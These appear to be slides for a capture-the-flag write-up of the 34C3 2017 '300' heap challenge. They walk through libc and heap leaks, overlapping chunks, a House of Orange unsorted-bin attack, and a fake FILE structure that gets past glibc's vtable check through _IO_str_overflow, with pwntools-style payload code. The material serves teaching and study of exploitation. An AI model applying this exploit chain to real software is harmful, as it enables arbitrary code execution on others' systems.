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300 34c3 2017

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Challenge overview

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Challenge overview ● _QWORD allocs[10]; ● // Global array of 10 pointers (referred to as slots) ● Operations: alloc(), write(), print(), free()

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Challenge overview ● User enters ‘i’, i > 0 && i < 10 ● alloc(int i): allocs[i] = malloc(0x300); ● write(int i): read(0, allocs[i], 0x300); ● print(int i): write(1, allocs[i], strlen(allocs[i])); ● free(int i): free(allocs[i]); No other check apart from ‘i’.

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Libc leaking ● Read a free chunk in the unsorted bin ● alloc(0) ● alloc(1) ● free(0) ● read(0)

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Heap address leaking ● Read a chunk in the unsorted bin ● alloc(0) ● alloc(1) ● alloc(2) ● alloc(3) ● free(2) ● free(0) ● read(0)

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Create overlapping chunks ● alloc(0) ● alloc(1) ● alloc(2) ● free(1) // Goes into unsorted bin Create a fake chunk header at the end of 0th slot ● payload = "a"*0x2e0 + p64(0) + p64(0x311) + \ ● p64(heap_base + 0x310) + \ ● p64(libc_leak) ● write(0, payload)

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Create overlapping chunks Use after free in 1st slot to modify linked list pointers in unsorted bin ● write(1, p64(libc_leak) + p64(heap_base + 0x2f0)) Unsorted bin now appears to have 2 chunks, the original 1st chunk and the fake chunk at the end of 0th chunk ● alloc(1) // The original 1st slot chunk ● alloc(4) # The fake chunk, just before 1st chunk ● free(1) # Insert the original 1st chunk back into unsorted bin

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House of Orange Overwrite the size of free chunk to 0x61, modify pointers to point to ‘io_list_all_addr - 0x10’. Also, prepare a fake ‘FILE’ structure. ● write(4, .. + p64(0x61) + .. + p64(io_list_all_addr - 0x10) + ..) Allocate another chunk, since size of chunk unsorted bin != 0x300, it will go to small bin, triggering house of orange ● alloc(5)

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Problem ● Libc being used is recent - vtable check. ● Commit:;a=commitdiff;h=db3476aff19 b75c4fdefbe65fcd5f0a90588ba51 ● IO_validate_vtable: ● _IO_vtable_check:

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Idea ● We can make our fake vtable point to anywhere inside ‘__libc_IO_vtables’ without triggering any check ● ‘_IO_str_jumps’ section is inside this section and contains two functions fitting our purpose: ‘_IO_str_overflow’ and ‘_IO_wstr_finish’

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_IO_str_overflow (_IO_FILE *fp, int c) Source: Provided a few checks on ‘fp’ pass, this leads to: ● (char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size); fp->_s._allocate_buffer = (&fp + 0xe0) (just after the ‘vtable’ pointer)

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First param: new_size ● #define _IO_blen(fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base) ● size_t old_blen = _IO_blen (fp); ● _IO_size_t new_size = 2 * old_blen + 100; Check to be passed: ● pos = fp->_IO_write_ptr - fp->_IO_write_base; ● if (pos >= (_IO_size_t) (_IO_blen (fp))) To pass ‘x’ as param, set: ● _IO_write_base and _IO_buf_base = 0 ● _IO_write_ptr and _IO_buf_end = (x-100)/2

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Exploit ● # Craft file struct ● file_struct = pack_file(_IO_buf_base = 0, ● _IO_buf_end = (rdi-100)/2, ● _IO_write_ptr = (rdi-100)/2, ● _IO_write_base = 0, ● _lock = bin.symbols['fake_file'] + 0x80) ● # vtable pointer ● file_struct += p64(fake_vtable_addr) ● # (*((_IO_strfile *) fp)->_s._allocate_buffer) ● file_struct += p64(rip)

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Conclusion If we have control over a few additional fields in the FILE structure, we can still have control `rip` as well as `rdi` (the first parameter) despite the recent vtable protection.

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